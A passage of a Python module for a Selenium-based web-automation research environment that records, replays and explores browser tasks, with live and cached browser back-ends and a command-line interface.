taskset_dict = json.load(taskset_json_file)
taskset_json_file.close()
start_urls = taskset_dict["start_urls"] if "start_urls" in taskset_dict else []
task_dicts = taskset_dict["tasks"]
for task_key in task_dicts:
task_dict = task_dicts[task_key]
task_urls = [task_dict.pop("start_url")] if "start_url" in task_dict else start_urls
for task_url in task_urls:
task_host = Utils.get_host(url=task_url)
task_name = "%s_%s_%s_" % (taskset_name, task_key, task_host)
task = Task(name=task_name, start_url=task_url, **task_dict)
tasks.append(task)
return tasks
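# Demonstration recording: the injected page script reports each user action as a line of the form
# "<action_type> #<value># @ <locator>" (parsed with ACTION_RE below), and the Shift+ hotkeys
# control the recording loop in WebBotEnv.demonstrate().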
ACTION_RE = r"(\S+) #(.*)# @ (.+)"
ACTION_DEMO_SAVE = "Shift+S"
ACTION_DEMO_CURRENT = "Shift+C"
ACTION_DEMO_NEXT = "Shift+N"
ACTION_DEMO_QUIT = "Shift+Q"
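# ChromeBrowser drives a real Chrome instance through Selenium. It injects resources/webbot.js
# (window.ylController) to extract the page state as JSON and to perform actions via JavaScript
# when the native Selenium interaction fails.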
class ChromeBrowser:
def __init__(self, wait=1.0, proxy=None, mobile=False, headless=False, restart_reset=False,
chrome_path=None, extension_path=None, **kwargs):
self.logger = logging.getLogger("Browser")
self.wait = wait
self.mobile = mobile
self.headless = headless
self.restart_reset = restart_reset
self.window_width = 1200
self.window_height = 1200
# Specify window size
if self.mobile:
self.window_width = 540
self.window_height = 960
webbot_js_path = os.path.abspath(os.path.join(".", "resources", "webbot.js"))
self.webbot_js = "".join(open(webbot_js_path).readlines())
self._chrome_options = webdriver.ChromeOptions()
# Specify window size
if self.mobile:
mobile_emulation = {
"deviceMetrics": {"width": self.window_width, "height": self.window_height},
"userAgent": "Mozilla/5.0 (Linux; Android 4.2.1; en-us; "
"Nexus 5 Build/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko) "
"Chrome/18.0.1025.166 Mobile Safari/535.19"
}
self._chrome_options.add_experimental_option("mobileEmulation", mobile_emulation)
else:
self._chrome_options.add_argument("--window-size=%d,%d" % (self.window_width, self.window_height))
self._chrome_options.add_argument("--disable-notifications")
self._chrome_options.add_argument('--no-sandbox')
self._chrome_options.add_argument('--disable-dev-shm-usage')
if chrome_path is not None:
            self._chrome_options.binary_location = chrome_path
if extension_path is not None:
print("Loading extension")
# extension_path = "~/AppData/Local/Google/Chrome/User Data/Default/Extensions/chrome_extension/"
            # self._chrome_options.add_argument("--load-extension=%s" % extension_path)
# extension_path = "/mnt/f/Appstract_android/webRL/tests/chrome-extension.crx"
self._chrome_options.add_extension(extension_path)
else:
self.logger.debug("no extension to load ---------------------------------------")
# Headless chrome doesn"t support extensions
if headless:
self._chrome_options.add_argument("--headless")
# Use proxy
if proxy:
self._chrome_options.add_argument("--proxy-server=%s" % proxy)
self._chrome_options.add_argument("--proxy-bypass-list=localhost")
self.driver = None
self.root_window = None
self.setup()
def setup(self):
capabilities = DesiredCapabilities().CHROME
capabilities["pageLoadStrategy"] = "normal" # complete
# capabilities["pageLoadStrategy"] = "eager" # interactive, NOTE: not supported
# capabilities["pageLoadStrategy"] = "none"
capabilities["loggingPrefs"] = {"browser": "ALL"}
system = platform.system()
if "Microsoft" in platform.release():
chromedriver_path = os.path.abspath(os.path.join(".", "resources", "chromedriver_win32.exe"))
elif system == "Windows":
chromedriver_path = os.path.abspath(os.path.join(".", "resources", "chromedriver_win32.exe"))
elif system == "Linux":
chromedriver_path = os.path.abspath(os.path.join(".", "resources", "chromedriver_linux64"))
elif system == "Darwin":
chromedriver_path = os.path.abspath(os.path.join(".", "resources", "chromedriver_max64"))
else:
self.logger.warning("Unsupported system: %s" % system)
sys.exit(-1)
self.driver = webdriver.Chrome(
chrome_options=self._chrome_options,
desired_capabilities=capabilities,
executable_path=chromedriver_path)
self.driver.implicitly_wait(10)
self.driver.set_page_load_timeout(10)
self.root_window = self.driver.current_window_handle
self._resize_window()
#test for extension
#self.driver.get('https://bing.com')
#try:
# time.sleep(3)
# header = self.driver.find_element_by_id('installed')
# print('Success! :-)')
#except NoSuchElementException:
# print('Failure! :-(')
#finally:
# self.driver.quit()
def _resize_window(self):
if self.mobile:
return
cmd = "return [window.outerWidth-window.innerWidth, window.outerHeight-window.innerHeight];"
padding = self.driver.execute_script(cmd)
expected_window_size = [self.window_width + padding[0], self.window_height + padding[1]]
self.driver.set_window_size(width=expected_window_size[0], height=expected_window_size[1])
def _check_webbot_present(self):
cmd = "return window.ylController != undefined;"
try:
if self.driver.execute_script(cmd):
return True
except:
pass
self.driver.execute_script(self.webbot_js)
# time.sleep(2)
is_present = self.driver.execute_script(cmd)
assert is_present
return True
def _execute_script(self, cmd, *args):
self._check_webbot_present()
        return self.driver.execute_script(cmd, *args)
def _take_screenshot(self):
screenshot = self.driver.get_screenshot_as_png()
screenshot = Image.open(BytesIO(screenshot))
return screenshot
def _zoom_page(self, ratio=0.9):
script = "document.body.style.zoom=%s;" % ratio
return self.driver.execute_script(script)
def _get_state_from_json(self, state_json):
try:
state_dict = json.loads(state_json)
screenshot = self._take_screenshot()
state = State(state_dict=state_dict, screenshot=screenshot)
return state
except Exception:
self.logger.warning("_get_state_from_json failed.")
return None
def get_current_state(self):
try:
cmd = "return window.ylController.getStateJson();"
state_json = self._execute_script(cmd)
state = self._get_state_from_json(state_json)
return state
except TimeoutException:
self.logger.warning("get_current_state timeout")
return None
def perform_action(self, action):
target_locator = action.element.locator if action.element else None
return self.perform_action_by_locator(action.action_type, action.value, target_locator)
def _filter_actions(self, current_state, actions):
filtered_actions = actions
return filtered_actions
def locate_element(self, locator):
xpaths = locator.split(" || ")
for xpath in xpaths:
try:
target_element = self.driver.find_element_by_xpath(xpath)
if isinstance(target_element, WebElement):
return target_element
except Exception:
pass
self.logger.warning("Unable to locate element: %s" % locator)
def perform_action_by_locator(self, action_type, value, target_locator):
success = True
try:
if action_type == Action.FINISH:
return success
target_element = self.locate_element(target_locator)
xpath = target_locator.split(" || ")[0]
if action_type == Action.CLICK:
try:
target_element.click()
except:
self.logger.warning("Selenium failed to perform click, using JS instead. %s" % xpath)
action_dict = {
"action_type": "click",
"target_locator": xpath,
"value": value
}
self._execute_script("window.ylController.performActionJson(arguments[0]);",
json.dumps(action_dict))
elif action_type == Action.CHECK:
try:
target_element.click()
except:
self.logger.warning("Selenium failed to perform check, using JS instead. %s" % xpath)
action_dict = {
"action_type": "check",
"target_locator": xpath,
"value": value
}
self._execute_script("window.ylController.performActionJson(arguments[0]);",
json.dumps(action_dict))
elif action_type == Action.SELECT:
try:
selected_index = int(value)
target_select = Select(target_element)
target_select.select_by_index(selected_index)
except:
self.logger.warning("Selenium failed to perform select, using JS instead. %s" % xpath)
action_dict = {
"action_type": "check",
"target_locator": xpath,
"value": value
}
self._execute_script("window.ylController.performActionJson(arguments[0]);",
json.dumps(action_dict))
elif action_type == Action.INPUT_TEXT:
try:
target_element.clear()
time.sleep(0.5)
target_element.send_keys(value)
except:
self.logger.warning("Selenium failed to perform input, using JS instead. %s" % xpath)
action_dict = {
"action_type": "setValue",
"target_locator": xpath,
"value": value
}
self._execute_script("window.ylController.performActionJson(arguments[0]);",
json.dumps(action_dict))
elif action_type == Action.PRESS_ENTER:
target_element.send_keys(Keys.ENTER)
else:
self.logger.warning("Cannot perform action %s" % action_type)
time.sleep(self.wait)
if Utils.get_host(self.driver.current_url) in LONG_WAIT_HOSTS:
time.sleep(3)
except TimeoutException:
self.logger.warning("perform_action_by_locator timeout")
pass
except Exception as e:
self.logger.warning("perform_action_by_locator failed: %s, locator: %s" %
(str(e).splitlines()[0], target_locator))
success = False
self.driver.switch_to.window(self.driver.window_handles[-1])
return success
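    # A small local HTTP server (port 7336) whose POST handler appends received lines to
    # self.log_lines; get_log() drains them. _listen_actions() relies on it to collect the action
    # lines reported by the injected page script while recording demonstrations.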
def start_log_server(self):
import threading
if sys.version_info[0] == 2:
            from BaseHTTPServer import HTTPServer
            from SimpleHTTPServer import SimpleHTTPRequestHandler
else:
from http.server import SimpleHTTPRequestHandler, HTTPServer
class MyHandler(SimpleHTTPRequestHandler):
def do_POST(self):
content_length = int(self.headers['Content-Length']) # Gets the size of data
post_data = self.rfile.read(content_length) # Gets the data itself
log_line = post_data.decode("utf-8") if isinstance(post_data, bytes) else str(post_data)
outer.log_lines.append(log_line)
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.send_header('Access-Control-Allow-Origin', '*')
self.end_headers()
self.wfile.write(b"OK")
outer = self
self.log_lines = []
self.log_server = HTTPServer(("", 7336), MyHandler)
def start_log_server():
self.log_server.serve_forever()
self.log_server_thread = threading.Thread(target=start_log_server)
        self.log_server_thread.daemon = True
self.log_server_thread.start()
time.sleep(1)
def stop_log_server(self):
if hasattr(self, "log_server") and self.log_server:
self.log_server.shutdown()
self.log_server_thread.join(0)
def get_log(self, through_console=False):
if through_console:
log_lines = []
log_entries = self.driver.get_log("browser")
for log_entry in log_entries:
message = log_entry["message"]
m = re.match(r"console-api \d+:\d+ \"WebBot (.+)\"", message)
if m:
log_lines.append(m.group(1).replace('\\"', '\"'))
return log_lines
if hasattr(self, "log_lines"):
r = self.log_lines.copy()
self.log_lines.clear()
return r
return []
def reset(self, url, restart=False):
if url.startswith("miniwob"):
rel_path = os.path.join("resources", "miniwob", url[len("miniwob_"):])
url = "file:///" + os.path.abspath(rel_path)
if self.restart_reset or restart or Utils.get_host(url) in RESTART_HOSTS:
self.close()
self.setup()
else:
try:
self.driver.delete_all_cookies()
self.driver.execute_script("window.localStorage.clear();")
self.driver.execute_script("window.sessionStorage.clear();")
except Exception:
pass
# self.logger.warning("Failed to clear cookie, session, or localStorage (ignored).")
try:
if self.root_window not in self.driver.window_handles:
self.root_window = self.driver.window_handles[0]
for window_handle in self.driver.window_handles:
if window_handle == self.root_window:
continue
self.driver.switch_to.window(window_handle)
self.driver.close()
self.driver.switch_to.window(self.root_window)
except Exception:
self.logger.warning("Failed to switch window, restarting browser.")
self.close()
self.setup()
try:
self._resize_window()
self.driver.get(url)
time.sleep(self.wait)
url_host = Utils.get_host(url)
if url_host in LONG_WAIT_HOSTS:
time.sleep(3)
if "demo.openmrs.org" in url_host:
script = '''
document.getElementById("username").value = "admin";
document.getElementById("password").value = "Admin123"
document.getElementById("Pharmacy").click();
document.getElementById("loginButton").click();'''
self._execute_script(script)
time.sleep(self.wait)
return True
except Exception as e:
self.logger.warning("Failed to resize window or open url: %s" % e)
return False
def close(self):
if self.driver:
self.driver.quit()
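# CacheBrowser mimics the ChromeBrowser interface but replays transitions recorded in UTGs instead
# of driving a live browser, so agents can be run offline. On a cache miss it can optionally
# synthesize a fake state (use_fake_state).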
class CacheBrowser:
def __init__(self, utgs, name=None, **kwargs):
self.name = name if name else ""
self.logger = logging.getLogger("CacheBrowser(%s)" % self.name)
self.window_width = 1200
self.window_height = 1200
self._state_cache = {}
self.utgs = utgs
self.current_utg = None
self.current_state_str = None
self.use_fake_state = False
def _get_state(self, state_str):
if state_str not in self._state_cache:
state = self.current_utg.get_state(state_str)
self._state_cache[state_str] = state
return self._state_cache[state_str]
def get_current_state(self):
return self._get_state(self.current_state_str)
def perform_action(self, action):
if action.action_type == Action.FINISH:
return True
current_state = self.get_current_state()
next_state_weights = self.current_utg.get_next_state_weights(action, current_state)
if next_state_weights:
self.current_state_str = Utils.weighted_choice(next_state_weights)
return True
# elif action.action_type in [Action.SELECT, Action.INPUT_TEXT]:
if self.use_fake_state:
fake_state = Utils.create_fake_state(current_state, action)
if fake_state is not None:
fake_state_str = fake_state.state_str
if fake_state_str not in self.current_utg.G.nodes:
self._state_cache[fake_state_str] = fake_state
self.logger.warning("perform_action: fake state unseen")
else:
self.logger.warning("perform_action: fake state matched actual state")
self.current_state_str = fake_state_str
return True
self.logger.warning("perform_action: cache miss with action: %s", action)
self.current_state_str = self.current_utg.get_init_state_str()
return False
def _filter_actions(self, current_state, actions):
filtered_actions = []
for action in actions:
if self.current_utg.get_next_state_weights(action, current_state):
filtered_actions.append(action)
return filtered_actions
def reset(self, url, **kwargs):
self.current_utg = None
for utg in self.utgs:
if utg.start_url == url:
self.current_utg = utg
break
if self.current_utg is None:
self.logger.warning("reset: cache miss with url: %s" % url)
return False
self.current_state_str = self.current_utg.get_init_state_str()
return True
def close(self):
pass
class TaskCanvas:
def __init__(self, title=None, state_size=None):
self.title = title if title else "TaskCanvas"
self.padding = 50
if state_size is None:
state_size = [256, 256]
self.state_width, self.state_height = state_size
canvas_w = self.state_width * 2 + self.padding
canvas_h = self.state_height + self.padding
if sys.version_info[0] < 3:
import Tkinter as tkinter
else:
import tkinter
self.tk = tkinter.Tk()
self.tk.geometry("%dx%d+0+0" % (canvas_w, canvas_h))
self.tk.title(self.title)
self.canvas = tkinter.Canvas(self.tk, bg="white", width=canvas_w, height=canvas_h)
self.canvas.pack()
self.__canvas_tmp_objs = []
def render_task(self, task):
assert isinstance(task, Task)
try:
c = self.canvas
for obj in self.__canvas_tmp_objs:
c.delete(obj)
if len(task.state_history) > 0:
state1 = task.state_history[-1]
screen = state1.screenshot.resize([self.state_width, self.state_height], Image.ANTIALIAS)
img1 = ImageTk.PhotoImage(screen)
img1_ = c.create_image(0, 0, anchor="nw", image=img1)
self.__canvas_tmp_objs.append(img1_)
if task.state:
state2 = task.state
screen = state2.screenshot.resize([self.state_width, self.state_height], Image.ANTIALIAS)
img2 = ImageTk.PhotoImage(screen)
img2_ = c.create_image(self.state_width + self.padding, 0, anchor="nw", image=img2)
self.__canvas_tmp_objs.append(img2_)
if len(task.action_history) > 0:
action = task.action_history[-1]
text1 = c.create_text(self.state_width + self.padding / 2,
self.state_height + self.padding / 2,
anchor="center",
text="task:%s \t action:%s \t reward:%d" %
(task.name, action.action_type, task.reward))
self.__canvas_tmp_objs.append(text1)
                arrow1 = c.create_line(self.state_width, self.state_height / 2,
                                       self.state_width + self.padding, self.state_height / 2,
arrow="last", width=4.0)
self.__canvas_tmp_objs.append(arrow1)
if action.element:
ele_bound = action.element.get_resized_bound(new_width=self.state_width,
new_height=self.state_height)
bbox1 = c.create_rectangle(ele_bound["left"], ele_bound["top"],
ele_bound["right"], ele_bound["bottom"],
outline="red", width=2.0)
self.__canvas_tmp_objs.append(bbox1)
self.tk.update()
except:
traceback.print_exc()
def destroy(self):
self.tk.destroy()
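# WebBotEnv is the gym-style environment that ties a browser (real or cached) to a set of tasks.
# A rough usage sketch, with names as defined in this module (the tasks directory path is
# illustrative):
#   browser = ChromeBrowser(wait=1.0)
#   env = WebBotEnv(browser=browser, tasks=Task.load_tasks("tasks/"), visualize=False)
#   env.explore(n_episodes=10, policy="random")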
class WebBotEnv:
def __init__(self, browser, tasks, visualize=False, **kwargs):
self.logger = logging.getLogger("WebBotEnv")
self.browser = browser
self.tasks = tasks
self.visualize = visualize
self.canvas = TaskCanvas() if self.visualize else None
self.current_task = None
def render(self):
if self.visualize and self.canvas:
self.canvas.render_task(self.current_task)
# self.logger.info(f" number of actions in current state: {len(self.current_task.state.possible_actions)}")
def step(self, action):
"""
Take an action in current environment.
:param action: the action to take
:return: new_state, reward, done
"""
state = None
try:
# action_success = self.browser.perform_action(action)
# state = self.get_state() if action_success else None
success = self.browser.perform_action(action)
state = self.get_state() if success else None
except Exception:
self.logger.warning("step failed: %s" % action)
traceback.print_exc()
reward, done = self.current_task.update(action, state)
return state, reward, done
def explore(self, n_episodes=50, output_dir=None, policy="random", save_utg=False):
try:
if output_dir and save_utg:
for task in self.tasks:
task.utg.states_dir = os.path.join(output_dir, "states")
for episode in range(1, n_episodes + 1):
self.reset()
task = self.current_task.snapshot()
self.logger.info("Episode %d/%d, task: %s" % (episode, n_episodes, task.task_str))
while True:
if task.done:
break
self.render()
preferred_actions = task.get_preferred_actions()
possible_actions = task.state.possible_actions
if len(possible_actions) == 0:
break
if len(preferred_actions) == 0:
preferred_actions = possible_actions
if policy == "similarity":
action_scores = {}
for action in preferred_actions:
action_scores[action] = task.get_action_usefulness(action)
action = Utils.weighted_choice(action_scores)
elif policy == "random":
action = random.choice(possible_actions)
elif policy == "random_restricted":
action = random.choice(preferred_actions)
elif policy == "demo_biased":
actions_in_demo = []
for action in preferred_actions:
if action.replay_api in task.demonstration:
actions_in_demo.append(action)
rand = random.uniform(0, 1)
if len(actions_in_demo) > 0 and rand < 0.5:
action = random.choice(actions_in_demo)
else:
action = random.choice(preferred_actions)
else:
action = random.choice(possible_actions)
self.step(action)
task_ = self.current_task.snapshot()
task = task_
self.logger.info("\tExplore, action:%s, %s" % (action, task.get_reward_str()))
if output_dir and episode % 50 == 0:
task.save(task_dir=output_dir, save_utg=save_utg, overwrite=True)
except KeyboardInterrupt:
self.logger.info("Keyboard interrupt.")
pass
except Exception as e:
self.logger.warning("gen_utg failed: %s" % e)
traceback.print_exc()
def get_state(self):
try:
state = self.browser.get_current_state()
if state:
state.setup(self.current_task)
return state
except Exception as e:
self.logger.error("get_state failed with error: %s" % e)
return None
def reset(self, new_task=None):
# Switch to a random task
self.current_task = new_task if new_task else random.choice(self.tasks)
self.browser.reset(self.current_task.start_url)
retry_count = 0
while True:
state = self.get_state()
if state and len(state.possible_actions) > 0:
break
retry_count += 1
if retry_count == 2:
self.logger.warning("reset failed, restarting browser: %s." % self.current_task.start_url)
self.browser.reset(self.current_task.start_url, restart=True)
continue
if retry_count > 3:
self.logger.warning("reset failed: %s." % self.current_task.start_url)
break
self.current_task.reset(state)
return state
def _listen_actions(self):
def parse_action_lines(lines):
lines_parsed = []
last_line, last_action_type, last_target_locator = None, None, None
last_output_ele = None
for line in lines:
m = re.match(ACTION_RE, line)
if m:
action_type, value, target_locator = m.group(1), m.group(2), m.group(3)
if last_action_type == Action.INPUT_TEXT and \
(action_type != last_action_type or target_locator != last_target_locator):
lines_parsed.append(last_line)
if action_type == Action.FINISH:
if target_locator == last_output_ele:
lines_parsed.append(line)
last_output_ele = None
else:
last_output_ele = target_locator
if action_type != Action.INPUT_TEXT and action_type != Action.FINISH:
lines_parsed.append(line)
last_line, last_action_type, last_target_locator = line, action_type, target_locator
else:
self.logger.warning("parse_action_lines failed: %s" % line)
if last_action_type == Action.INPUT_TEXT:
lines_parsed.append(last_line)
filtered_action_lines = []
for i, action_line in enumerate(lines_parsed):
if i > 0:
m = re.match(ACTION_RE, action_line)
action_type, value, target_locator = m.group(1), m.group(2), m.group(3)
if action_type == Action.INPUT_TEXT:
last_action_line = filtered_action_lines[-1]
m = re.match(ACTION_RE, last_action_line)
last_action_type, last_value, last_target_locator = m.group(1), m.group(2), m.group(3)
if last_action_type == Action.CLICK and last_target_locator == target_locator:
filtered_action_lines.pop(len(filtered_action_lines) - 1)
filtered_action_lines.append(action_line)
return filtered_action_lines
log_lines = []
self.browser.get_log()
while True:
try:
for log_line in self.browser.get_log():
print("Action captured: ", log_line)
if log_line in [ACTION_DEMO_SAVE, ACTION_DEMO_CURRENT, ACTION_DEMO_NEXT, ACTION_DEMO_QUIT]:
return log_line, parse_action_lines(log_lines)
else:
log_lines.append(log_line)
if self.browser.driver.current_window_handle != self.browser.driver.window_handles[-1]:
self.browser.driver.switch_to.window(self.browser.driver.window_handles[-1])
self.browser._execute_script("window.ylController.listenActions();")
time.sleep(0.5)
except Exception:
pass
def demonstrate(self, output_dir=None, save_utg=False, skip_existing=True, verify_after_demo=True):
self.browser.start_log_server()
for task in self.tasks:
if skip_existing and os.path.exists(os.path.join(output_dir, task.name + "task.json")):
continue
while True:
self.reset(new_task=task)
print("Demonstrating task %s: %s" % (task.name, task.task_str))
print("\t%s: \tSave the demonstration of current task" % ACTION_DEMO_SAVE)
print("\t%s: \tRe-demonstrate current task" % ACTION_DEMO_CURRENT)
print("\t%s: \tDemonstrate next task" % ACTION_DEMO_NEXT)
print("\t%s: \tQuit demonstration" % ACTION_DEMO_QUIT)
print("\tDouble click: \tSelect output")
demo_control, action_lines = self._listen_actions()
if demo_control in [ACTION_DEMO_SAVE]:
task.demonstration = action_lines
task.target_url = task.state.url
task.save(output_dir, save_utg=save_utg, as_demo=True)
if verify_after_demo:
print("verifying the demonstration by replaying ...")
                        replay_succeeded = self._replay_actions(task, action_lines=action_lines)
                        if replay_succeeded:
print("replay succeeded")
continue
elif demo_control in [ACTION_DEMO_CURRENT]:
continue
elif demo_control in [ACTION_DEMO_NEXT, ACTION_DEMO_QUIT]:
break
else:
self.logger.warning("Unknown demo_control: " + demo_control)
if demo_control in [ACTION_DEMO_QUIT]:
break
self.browser.stop_log_server()
self.logger.info("Done demonstrating tasks.")
def _replay_actions(self, task, action_lines):
success = True
try:
self.reset(new_task=task)
except Exception as e:
self.logger.error("replay failed during resetting: %s" % e)
traceback.print_exc()
return False
for line in action_lines:
try:
self.render()
m = re.match(ACTION_RE, line)
action_type, value, target_locator = m.group(1), m.group(2), m.group(3)
target_ele = task.state.get_element_by_locator(target_locator)
action = Action(element=target_ele, action_type=action_type, value=value)
state, reward, done = self.step(action)
self.logger.info("\tReplay, action:%s, %s" % (action, task.get_reward_str()))
except Exception as e:
self.logger.error("replay failed during executing %s: %s" % (line, e))
success = False
traceback.print_exc()
continue
if state is None:
success = False
task.target_state_str = task.state.state_str
self.logger.info("final url is %s" % task.state.url)
return success
def analyze_task_complexity(self, task, action_lines):
success = True
try:
self.reset(new_task=task)
except Exception as e:
self.logger.error("replay failed during resetting: %s" % e)
traceback.print_exc()
return False
num_actions_list = []
num_sim_actions_list = []
num_inputs_list = []
num_words_list = []
num_elements_list = []
set_urls = set()
from form_agent import FormManager
for line in action_lines + [None]:
try:
self.render()
state = task.state
if not isinstance(state, State):
continue
words = state.text.split()
num_words_list.append(len(words))
num_actions_list.append(len(state.possible_actions))
num_sim_actions_list.append(len(task.get_preferred_actions()))
num_elements_list.append(len(state.elements_in_window))
input_candidates = FormManager.extract_input_candidates(task)
num_inputs_list.append(len(input_candidates))
set_urls.add(state.url)
if line is None:
continue
m = re.match(ACTION_RE, line)
action_type, value, target_locator = m.group(1), m.group(2), m.group(3)
target_ele = task.state.get_element_by_locator(target_locator)
action = Action(element=target_ele, action_type=action_type, value=value)
state, reward, done = self.step(action)
self.logger.info("\tReplay, action:%s, %s" % (action, task.get_reward_str()))
except Exception as e:
self.logger.error("replay failed during executing %s: %s" % (line, e))
success = False
traceback.print_exc()
continue
if state is None:
success = False
num_actions = np.mean(num_actions_list)
num_sim_actions = np.mean(num_sim_actions_list)
num_elements = np.mean(num_elements_list)
num_inputs = np.mean(num_inputs_list)
num_words = np.mean(num_words_list)
num_pages = len(set_urls)
num_demo_steps = len(action_lines)
num_demo_click_steps = len([line for line in action_lines if line.startswith('click')])
num_demo_input_steps = len([line for line in action_lines if line.startswith('input_text') or line.startswith('select')])
num_parameters = len(task.parameter_ids)
num_task_words = len(task.query_words)
task.target_state_str = task.state.state_str
self.logger.info("final url is %s" % task.state.url)
success_tag = 'Y' if success else 'N'
self.logger.info("Task complexity head task_name "
"num_actions num_sim_actions num_inputs num_words num_elements "
"num_pages num_demo_steps num_demo_click_steps num_demo_input_steps "
"num_parameters num_task_words success_tag")
self.logger.info(f"Task complexity row {task.name} "
f"{num_actions} {num_sim_actions} {num_inputs} {num_words} {num_elements} "
f"{num_pages} {num_demo_steps} {num_demo_click_steps} {num_demo_input_steps} "
f"{num_parameters} {num_task_words} {success_tag}")
return success
def _generalize(self, task, action_lines):
# TODO implement this
replay_success = self._replay_actions(task, action_lines)
if not replay_success:
return False
state_explored_action_lines = {}
state_effective_actions = {}
def is_fully_explored():
for state_str in state_explored_action_lines:
tried_actions = state_explored_action_lines[state_str]
for action_line in action_lines:
if action_line not in tried_actions:
return False
return True
def get_unexplored_action(state):
for action_line in action_lines:
if action_line in state_explored_action_lines[state.state_str]:
continue
state_explored_action_lines[state.state_str].add(action_line)
m = re.match(ACTION_RE, action_line)
action_type, value, target_locator = m.group(1), m.group(2), m.group(3)
element = state.get_element_by_locator(target_locator)
if element:
return Action(element=element, action_type=action_type, value=value)
return None
while not is_fully_explored():
self.reset(new_task=task)
while True:
if task.state.state_str not in state_explored_action_lines:
state_explored_action_lines[task.state.state_str] = set()
if task.state.state_str not in state_effective_actions:
state_effective_actions[task.state.state_str] = set()
action = get_unexplored_action(task.state)
if not action:
                    # state_effective_actions stores sets; random.choice needs a sequence
                    action = random.choice(list(state_effective_actions[task.state.state_str]))
state, reward, done = self.step(action=action)
if state:
state_effective_actions[task.state.state_str].add(action)
                self.logger.info("\tGeneralize, action:%s, reward:%.2f, done:%s" %
                                 (action, task.reward, task.done))
                if done:
                    break
return True
def replay(self, replay_source=None):
for task in self.tasks:
self.logger.info("Replaying task: %s" % task.task_str)
if replay_source == "demonstration" or replay_source is None:
action_lines = task.demonstration
elif replay_source == "history":
action_lines = task.action_history
else:
action_lines = replay_source
if action_lines:
                replay_succeeded = self._replay_actions(task, action_lines=action_lines)
                if replay_succeeded:
self.logger.info("Done replaying, total_reward %.2f" % task.total_reward)
else:
self.logger.warning("Cannot replay task: %s" % task.task_str)
def post_process(self, task, tasklet):
self.logger.info("Postprocessing tasklet:\n%s" % tasklet)
original_replay_trace = Task.get_replay_trace_from_tasklet(tasklet)
original_reward = Task.get_total_reward_from_tasklet(tasklet)
original_tasklet = tasklet
replay_trace = copy.copy(original_replay_trace)
self._replay_actions(task, replay_trace)
if original_reward is None:
original_reward = task.total_reward
original_final_screen = task.state.screenshot
# try remove negative-reward actions
negative_reward_actions = []
if len(task.action_history) == len(task.reward_history):
for i, action in enumerate(task.action_history):
action_reward = task.reward_history[i][0]
if i == len(replay_trace) and action.is_submit:
continue
if action_reward <= 0:
negative_reward_actions.append(action)
for action in negative_reward_actions:
new_replay_trace = copy.copy(replay_trace)
if action.replay_api not in new_replay_trace:
continue
new_replay_trace.remove(action.replay_api)
self.logger.info("checking whether action is removable: %s" % action)
replay_success = self._replay_actions(task, new_replay_trace)
if replay_success and task.total_reward >= original_reward:
# this action is removable
self.logger.info("removable: %s" % action)
replay_trace = new_replay_trace
else:
# this action is not removable
self.logger.info("not removable: %s" % action)
if len(negative_reward_actions) > 0:
self._replay_actions(task, replay_trace)
# try append form submission action
if len(task.action_history) > 0:
last_action = task.action_history[-1]
form_submit_action = None
if last_action.element and last_action.element.parent_form and not last_action.is_submit:
form_submit_action = last_action.element.parent_form.form_submit_action
if form_submit_action:
self.logger.info("append action: %s" % form_submit_action)
replay_trace.append(form_submit_action.replay_api)
elif last_action.action_type == Action.INPUT_TEXT:
press_enter_action = Action(last_action.element, Action.PRESS_ENTER, "")
self.logger.info("append action: %s" % press_enter_action)
replay_trace.append(press_enter_action.replay_api)
self._replay_actions(task, replay_trace)
if task.total_reward >= original_reward:
final_screen = task.state.screenshot
return task.get_tasklet(), task.total_reward, final_screen
else:
return original_tasklet, original_reward, original_final_screen
def destroy(self):
if self.canvas:
self.canvas.destroy()
def parse_args():
"""
    Parse command line arguments.
    :return: argparse.Namespace with the parsed arguments
"""
parser = argparse.ArgumentParser(description="Start WebBot to test websites.")
# Task definitions
parser.add_argument("-start_url", action="store", dest="start_url", default=None,
help="The url to start with, ex. https://www.google.com/.")
parser.add_argument("-query", action="store", dest="query", default="",
help="The task query, ex. \"search\"")
parser.add_argument("-parameter", action="append", dest="parameters", default=[],
help="The parameter key:value pair, ex. \"word:microsoft\"")
parser.add_argument("-included_url_re", action="append", dest="included_url_res", default=[],
help="Stop (fail) current episode if the url doesn't match any included_url_re")
parser.add_argument("-target_url_re", action="append", dest="target_url_res", default=[],
help="Stop (success) current episode if the url matches all target_url_re")
parser.add_argument("-target_text_re", action="append", dest="target_text_res", default=[],
help="Stop (success) current episode if the text matches all target_text_re")
parser.add_argument("-task_path", action="store", dest="task_path", default=None,
help="Path to *task.json file or directory.")
# Browser settings
parser.add_argument("-wait", action="store", dest="wait", type=float, default=0.1,
help="Minimum time to wait after each action, in seconds.")
parser.add_argument("-proxy", action="store", dest="proxy", type=str, default=None,
help="IP:PORT proxy to use.")
parser.add_argument("-mobile", action="store_true", dest="mobile", default=False,
help="Test in mobile mode.")
parser.add_argument("-headless", action="store_true", dest="headless", default=False,
help="Run browser in headless mode (do not start browser GUI).")
parser.add_argument("-extension_path", action="store", dest="extension_path", default=None,
                        help="Path to extension .crx file. Run browser with a predefined extension installed. "
                             "It does not work if headless is set to True.")
# Environment settings
parser.add_argument("-demonstrate", action="store_true", dest="demonstrate", default=False,
help="Demonstrate the tasks.")
parser.add_argument("-replay", action="store", dest="replay_source", default=None,
help="Replay the tasks. Argument value can be \"demonstration\" or \"history\"")
parser.add_argument("-explore", action="store_true", dest="explore", default=False,
help="Explore the tasks.")
parser.add_argument("-visualize", action="store_true", dest="visualize", default=False,
help="Visualize state transitions.")
parser.add_argument("-output_dir", action="store", dest="output_dir", default=None,
help="The directory to save utg.")
parser.add_argument("-save_utg", action="store_true", dest="save_utg", default=False,
help="Save the UI transition graph and states.")
args, unknown = parser.parse_known_args()
return args
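# Illustrative invocation of the CLI defined above (the script name, URL, query
# and parameter values here are hypothetical, not taken from this repository):
#
#   python webbot.py -start_url https://www.example.com/ -query "search" \
#       -parameter "word:microsoft" -headless -replay demonstration
#
# Note that parse_known_args() is used, so unrecognized extra flags are ignored
# rather than treated as errors.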
def main():
logging.basicConfig(level=logging.INFO, format="%(asctime)s %(name)-12s %(levelname)-8s %(message)s")
args = parse_args()
print(args)
arg_browser = ChromeBrowser(
wait=args.wait,
proxy=args.proxy,
mobile=args.mobile,
headless=args.headless,
        extension_path=args.extension_path
)
tasks = []
if args.start_url:
arg_task = Task(
start_url=args.start_url,
included_url_res=args.included_url_res,
target_url_res=args.target_url_res,
target_text_res=args.target_text_res,
query_words=args.query.split()
)
tasks.append(arg_task)
tasks.extend(Task.load_tasks(args.task_path))
if args.save_utg and args.output_dir:
for task in tasks:
